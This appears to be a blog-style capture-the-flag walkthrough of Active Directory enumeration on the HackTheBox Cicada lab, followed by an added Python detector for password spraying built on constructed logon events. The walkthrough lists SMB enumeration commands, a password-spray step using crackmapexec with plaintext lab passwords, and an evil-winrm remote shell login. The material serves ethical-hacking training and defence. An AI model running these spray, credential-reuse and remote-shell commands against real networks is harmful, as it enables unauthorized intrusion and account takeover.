Active Directory Enumeration: Ethical Hacking
Let's hack Active Directory by using the HackTheBox Cicada server. We will focus on enumerating and exploiting Active Directory rather than completing the Capture The Flag challenge. Here are the commands I used to walk through the challenge:

enum4linux -A 10.10.11.35
enum4linux -A 10.10.11.35 -u guest
smbmap -u guest -H 10.10.11.35
smbclient -L 10.10.11.35 --no-pass
smbclient //10.10.11.35/HR #anonymous login
#Download and enumerate files
impacket-lookupsid 'cicada.htb/guest'@10.10.11.35 -no-pass
#password spray captured default passwd to all users
crackmapexec smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
crackmapexec smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
crackmapexec smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
smbclient //10.10.11.35/DEV -U david.orelious
#Download and enumerate files
evil-winrm -i 10.10.11.35 -u emily.oscars

Also, here's a great cheatsheet to check out: https://cheatsheet.haax.fr/windows-systems/exploitation/crackmapexec/

Make sure to check out https://Pentest.TV for additional resources, including free ethical hacking courses.

Happy Hacking!
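A defender's view of the password spray step above, as an added example that is not part of the original post: it flags a source that fails logons for many distinct accounts within a short window and reports any account that authenticated from that source during the same burst. The event tuples, IP addresses and `constructed.*` accounts are constructed sample data, and the window and threshold values are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: simplified Security-log logon events as
# (time, event_id, source_ip, account); 4625 = failed, 4624 = successful logon.
# IPs and the two "constructed.*" accounts are made up for illustration.
EVENTS = [
    ("2024-10-01T09:00:00", 4625, "192.0.2.20", "emily.oscars"),
    ("2024-10-01T09:00:20", 4625, "192.0.2.20", "emily.oscars"),
    ("2024-10-01T09:00:45", 4624, "192.0.2.20", "emily.oscars"),
    ("2024-10-01T10:00:01", 4625, "192.0.2.50", "david.orelious"),
    ("2024-10-01T10:00:02", 4625, "192.0.2.50", "emily.oscars"),
    ("2024-10-01T10:00:03", 4625, "192.0.2.50", "constructed.user1"),
    ("2024-10-01T10:00:04", 4625, "192.0.2.50", "constructed.user2"),
    ("2024-10-01T10:00:05", 4624, "192.0.2.50", "michael.wrightson"),
]

def detect_spray(events, window=timedelta(minutes=5), min_accounts=4):
    """Return sources that failed logons for >= min_accounts distinct accounts
    inside one sliding window, plus accounts that succeeded from that source
    during the same burst (the credentials to reset first)."""
    by_src = defaultdict(list)
    for ts, event_id, src, account in events:
        by_src[src].append((datetime.fromisoformat(ts), event_id, account.lower()))
    findings = []
    for src, recs in sorted(by_src.items()):
        recs.sort()
        fails = [(t, a) for t, eid, a in recs if eid == 4625]
        best, span, start = set(), None, 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1  # slide the window forward
            accounts = {a for _, a in fails[start:end + 1]}
            if len(accounts) > len(best):
                best, span = accounts, (fails[start][0], fails[end][0] + window)
        if len(best) >= min_accounts:
            hits = sorted({a for t, eid, a in recs
                           if eid == 4624 and span[0] <= t <= span[1]})
            findings.append({"source": src, "targeted": sorted(best),
                             "succeeded": hits})
    return findings

if __name__ == "__main__":
    for finding in detect_spray(EVENTS):
        print(finding)
```

The single user who mistypes a password twice from 192.0.2.20 is not flagged, because the rule counts distinct accounts per source rather than raw failures.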